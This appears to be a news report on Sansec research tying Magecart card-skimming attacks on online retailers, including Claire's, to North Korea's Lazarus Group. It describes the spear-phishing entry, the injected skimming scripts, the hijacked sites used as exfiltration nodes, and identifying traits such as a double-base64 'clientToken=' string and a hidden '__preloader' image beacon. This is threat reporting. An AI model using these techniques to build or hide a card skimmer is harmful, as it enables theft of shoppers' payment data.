The Lazarus Group, who are state-sponsored hackers linked to N. Korea, has added digital payment-card skimming to their methodology, researchers observed, using Magecart code.
Lazarus members are now targeting online payments made by US & European shoppers. Victims include Claire’s, the fashion accessory chain that was attacked in June, according to an analysis from Sansec issued Mon.
Malware Code
Researchers concluded that the infrastructure used in the attacks is the same that has been seen in other Lazarus operations & that “distinctive patterns in the malware code were identified that linked multiple hacks to the same actor.”
The analysis found that Lazarus was likely planting Magecart payment skimmers on major online retailer sites as early as May 2019. Magecart is an umbrella term including several different threat groups who typically use the same card-skimming scripts on checkout pages.
Magecart
Magento-based attacks are seen most often, but Magecart also attacks other e-commerce platforms, including Opencart, BigCommerce, Prestashop & Salesforce.
“In order to intercept transactions, an attacker needs to modify the computer code that runs an online store,” according to the writeup. “[Lazarus Group, a.k.a. Hidden Cobra] managed to gain access to the store code of large retailers e.g. international fashion chain Claire’s.”
Spear phishing
The researchers speculated that Lazarus is using spear phishing emails as its initial infection vector to compromise the sites – an effort ultimately aimed at obtaining the passwords of retail staff. The hackers then use that access to inject the skimming script, which captures information that shoppers enter into e-commerce check-out pages. The data is then sent to hacker-controlled servers via a global exfiltration network.
Tehran
“This network utilizes legitimate sites, that got hijacked & repurposed to serve as disguise for the criminal activity,” explained the firm. “The network is also used to funnel the stolen assets so they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, which include a modelling agency from Milan, a vintage music store from Tehran & a family-run book-store from New Jersey.”
Italian Modelling Site
The campaign was uncovered last summer, when the firm found a skimmer on a US truck-parts store, that used the compromised Italian modelling site to harvest payment data.
During following months, they found the same uniquely encoded malware on several dozen stores, all used the same hijacked sites as loaders & card collectors.
Researchers found multiple, independent links between recent skimming activity & previously documented North Korean hacking operations. These include shared infrastructure (including the domain registrar & DNS service, & common loader sites), as well as an odd code snippet, that Sansec has not seen anywhere else.
Javascript
“The injected script customize-gtag.min.js12 is scrambled with a popular Javascript obfuscator13. Hidden in the code, the string WTJ4cFpXNTBWRzlyWlc0OQ== is found, which is the double-base64 encoded representation of clientToken=,” according to the analysis. “This particular keyword is later used as HTTP GET parameter to send the stolen payload to the collector exfiltration node. The specific encoding & the attempt to disguise the stolen payload as ‘clientToken’ form a uniquely identifying characteristic.”
There are also common behaviour patterns such as adding a hidden, dynamic image to the page with the deceptive name (__preloader). The image address is controlled by the attacker, & the intercepted and encoded payload is sent as argument to this image, along with several random numbers.
Hijacked Sites
“Does the usage of common loader sites, & the similarity in time frame, prove that the DPRK-attributed operations are run by the same actor as the skimming operations?” the researchers said. “Theoretically, it is possible that different nefarious actors had simultaneous control over the same set of hijacked sites, but in practice, this would be extremely unlikely.
Firstly, 1000s of sites get hacked each day, making an overlap highly coincidental. Secondly, when a site gets hacked, it is common practice for a perpetrator to close the exploited vulnerability after gaining access, in order to shield the new asset from competitors.”
Digital Skimming
Korean hacking activity is aimed at both espionage, but also making money for the regime; and Sansec pointed out that the move into digital skimming represents a significant expansion.
“North Korea-backed attacks were mostly restricted to banks & South Korean crypto markets, covert cyber operations that earned hackers $2 billion, according to a 2019 UN report,” concluded the report. “As Sansec’s new research shows, they have now extended their portfolio with the profitable crime of digital skimming.”
